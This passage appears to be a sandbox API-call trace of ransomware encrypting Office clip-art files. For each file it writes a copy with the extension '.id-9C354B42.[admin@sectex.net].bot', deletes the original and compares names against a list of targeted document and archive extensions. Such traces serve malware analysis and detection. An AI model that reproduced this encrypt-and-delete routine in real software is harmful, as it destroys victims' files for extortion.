	[0147.175] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01660_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0147.176] GetLastError () returned 0x0
	[0147.176] ReadFile (in: hFile=0x31c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x329e, lpOverlapped=0x0) returned 1
	[0147.178] WriteFile (in: hFile=0x38c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x32a0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x32a0, lpOverlapped=0x0) returned 1
	[0147.179] ReadFile (in: hFile=0x31c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.179] WriteFile (in: hFile=0x38c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.179] SetEndOfFile (hFile=0x38c) returned 1
	[0147.179] CloseHandle (hObject=0x38c) returned 1
	[0147.179] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.179] SetEndOfFile (hFile=0x31c) returned 1
	[0147.181] CloseHandle (hObject=0x31c) returned 1
	[0147.181] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.182] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd01660_.wmf")) returned 1
	[0147.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63
	[0147.182] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63
	[0147.182] lstrlenW (lpString=".doc") returned 4
	[0147.182] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.182] lstrlenW (lpString=".docx") returned 5
	[0147.182] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.182] lstrlenW (lpString=".pdf") returned 4
	[0147.182] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.182] lstrlenW (lpString=".xls") returned 4
	[0147.182] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.182] lstrlenW (lpString=".xlsx") returned 5
	[0147.182] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.183] lstrlenW (lpString=".ppt") returned 4
	[0147.183] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63
	[0147.183] lstrlenW (lpString=".zip") returned 4
	[0147.183] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.183] lstrlenW (lpString=".rar") returned 4
	[0147.183] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.183] lstrlenW (lpString=".bz2") returned 4
	[0147.183] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.183] lstrlenW (lpString=".7z") returned 3
	[0147.183] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63
	[0147.183] lstrlenW (lpString=".dbf") returned 4
	[0147.183] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63
	[0147.183] lstrlenW (lpString=".1cd") returned 4
	[0147.183] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63
	[0147.183] lstrlenW (lpString=".jpg") returned 4
	[0147.183] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63
	[0147.183] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63
	[0147.183] lstrlenW (lpString=".doc") returned 4
	[0147.183] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.183] lstrlenW (lpString=".docx") returned 5
	[0147.183] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.183] lstrlenW (lpString=".pdf") returned 4
	[0147.183] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.183] lstrlenW (lpString=".xls") returned 4
	[0147.183] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.183] lstrlenW (lpString=".xlsx") returned 5
	[0147.184] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.184] lstrlenW (lpString=".ppt") returned 4
	[0147.184] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63
	[0147.184] lstrlenW (lpString=".zip") returned 4
	[0147.184] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.184] lstrlenW (lpString=".rar") returned 4
	[0147.184] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.184] lstrlenW (lpString=".bz2") returned 4
	[0147.184] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.184] lstrlenW (lpString=".7z") returned 3
	[0147.184] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63
	[0147.184] lstrlenW (lpString=".dbf") returned 4
	[0147.184] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63
	[0147.184] lstrlenW (lpString=".1cd") returned 4
	[0147.184] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.184] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD01660_.WMF") returned 63
	[0147.184] lstrlenW (lpString=".jpg") returned 4
	[0147.184] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.184] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.184] lstrlenW (lpString="FD02068_.WMF") returned 12
	[0147.184] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02068_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0147.185] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=2488) returned 1
	[0147.185] CloseHandle (hObject=0x31c) returned 1
	[0147.185] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02068_.wmf")) returned 0x20
	[0147.185] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02068_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02068_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c
	[0147.185] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.185] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.185] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02068_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0147.186] GetLastError () returned 0x0
	[0147.186] ReadFile (in: hFile=0x31c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x9b8, lpOverlapped=0x0) returned 1
	[0147.428] WriteFile (in: hFile=0x38c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x9c0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x9c0, lpOverlapped=0x0) returned 1
	[0147.429] ReadFile (in: hFile=0x31c, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.429] WriteFile (in: hFile=0x38c, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.429] SetEndOfFile (hFile=0x38c) returned 1
	[0147.429] CloseHandle (hObject=0x38c) returned 1
	[0147.429] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.429] SetEndOfFile (hFile=0x31c) returned 1
	[0147.431] CloseHandle (hObject=0x31c) returned 1
	[0147.431] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.431] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd02068_.wmf")) returned 1
	[0147.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63
	[0147.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63
	[0147.432] lstrlenW (lpString=".doc") returned 4
	[0147.432] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.432] lstrlenW (lpString=".docx") returned 5
	[0147.432] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.432] lstrlenW (lpString=".pdf") returned 4
	[0147.432] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.432] lstrlenW (lpString=".xls") returned 4
	[0147.432] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.432] lstrlenW (lpString=".xlsx") returned 5
	[0147.432] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.432] lstrlenW (lpString=".ppt") returned 4
	[0147.432] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63
	[0147.432] lstrlenW (lpString=".zip") returned 4
	[0147.432] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.432] lstrlenW (lpString=".rar") returned 4
	[0147.432] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.432] lstrlenW (lpString=".bz2") returned 4
	[0147.432] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.432] lstrlenW (lpString=".7z") returned 3
	[0147.432] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63
	[0147.432] lstrlenW (lpString=".dbf") returned 4
	[0147.433] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63
	[0147.433] lstrlenW (lpString=".1cd") returned 4
	[0147.433] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63
	[0147.433] lstrlenW (lpString=".jpg") returned 4
	[0147.433] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63
	[0147.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63
	[0147.433] lstrlenW (lpString=".doc") returned 4
	[0147.433] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.433] lstrlenW (lpString=".docx") returned 5
	[0147.433] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.433] lstrlenW (lpString=".pdf") returned 4
	[0147.433] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.433] lstrlenW (lpString=".xls") returned 4
	[0147.433] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.433] lstrlenW (lpString=".xlsx") returned 5
	[0147.433] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.433] lstrlenW (lpString=".ppt") returned 4
	[0147.433] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63
	[0147.433] lstrlenW (lpString=".zip") returned 4
	[0147.433] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.433] lstrlenW (lpString=".rar") returned 4
	[0147.433] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.433] lstrlenW (lpString=".bz2") returned 4
	[0147.433] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.433] lstrlenW (lpString=".7z") returned 3
	[0147.433] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63
	[0147.434] lstrlenW (lpString=".dbf") returned 4
	[0147.434] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63
	[0147.434] lstrlenW (lpString=".1cd") returned 4
	[0147.434] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02068_.WMF") returned 63
	[0147.434] lstrlenW (lpString=".jpg") returned 4
	[0147.434] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.434] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.434] lstrlenW (lpString="HH00084_.WMF") returned 12
	[0147.434] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00084_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0147.473] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=2472) returned 1
	[0147.473] CloseHandle (hObject=0x398) returned 1
	[0147.473] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00084_.wmf")) returned 0x20
	[0147.484] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00084_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0147.484] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.484] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00084_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.485] GetLastError () returned 0x0
	[0147.485] ReadFile (in: hFile=0x398, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x9a8, lpOverlapped=0x0) returned 1
	[0147.494] WriteFile (in: hFile=0x3c8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0x9b0, lpOverlapped=0x0) returned 1
	[0147.495] ReadFile (in: hFile=0x398, lpBuffer=0xb070020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa54fed4, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesRead=0xa54fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.495] WriteFile (in: hFile=0x3c8, lpBuffer=0xb070020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa54fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb070020*, lpNumberOfBytesWritten=0xa54fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.495] SetEndOfFile (hFile=0x3c8) returned 1
	[0147.495] CloseHandle (hObject=0x3c8) returned 1
	[0147.495] SetFilePointerEx (in: hFile=0x398, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.495] SetEndOfFile (hFile=0x398) returned 1
	[0147.497] CloseHandle (hObject=0x398) returned 1
	[0147.497] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.498] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00084_.wmf")) returned 1
	[0147.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63
	[0147.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63
	[0147.500] lstrlenW (lpString=".doc") returned 4
	[0147.500] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.500] lstrlenW (lpString=".docx") returned 5
	[0147.500] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.500] lstrlenW (lpString=".pdf") returned 4
	[0147.500] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.500] lstrlenW (lpString=".xls") returned 4
	[0147.500] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.500] lstrlenW (lpString=".xlsx") returned 5
	[0147.500] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.500] lstrlenW (lpString=".ppt") returned 4
	[0147.500] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63
	[0147.500] lstrlenW (lpString=".zip") returned 4
	[0147.500] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.500] lstrlenW (lpString=".rar") returned 4
	[0147.500] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.500] lstrlenW (lpString=".bz2") returned 4
	[0147.500] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.500] lstrlenW (lpString=".7z") returned 3
	[0147.500] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63
	[0147.500] lstrlenW (lpString=".dbf") returned 4
	[0147.500] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63
	[0147.500] lstrlenW (lpString=".1cd") returned 4
	[0147.500] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.500] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63
	[0147.500] lstrlenW (lpString=".jpg") returned 4
	[0147.501] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63
	[0147.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63
	[0147.501] lstrlenW (lpString=".doc") returned 4
	[0147.501] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.501] lstrlenW (lpString=".docx") returned 5
	[0147.501] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.501] lstrlenW (lpString=".pdf") returned 4
	[0147.501] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.501] lstrlenW (lpString=".xls") returned 4
	[0147.501] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.501] lstrlenW (lpString=".xlsx") returned 5
	[0147.501] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.501] lstrlenW (lpString=".ppt") returned 4
	[0147.501] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63
	[0147.501] lstrlenW (lpString=".zip") returned 4
	[0147.501] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.501] lstrlenW (lpString=".rar") returned 4
	[0147.501] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.501] lstrlenW (lpString=".bz2") returned 4
	[0147.501] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.501] lstrlenW (lpString=".7z") returned 3
	[0147.501] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63
	[0147.501] lstrlenW (lpString=".dbf") returned 4
	[0147.501] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63
	[0147.501] lstrlenW (lpString=".1cd") returned 4
	[0147.501] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.501] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned 63
	[0147.502] lstrlenW (lpString=".jpg") returned 4
	[0147.502] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.502] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.502] lstrlenW (lpString="HH00231_.WMF") returned 12
	[0147.502] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00231_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0147.504] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xa54ff1c | out: lpFileSize=0xa54ff1c*=2232) returned 1
	[0147.504] CloseHandle (hObject=0x3ac) returned 1
	[0147.505] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00231_.wmf")) returned 0x20
	[0147.505] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00231_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.505] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00231_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0147.505] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.505] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa54fec8 | out: lpNewFilePointer=0x0) returned 1
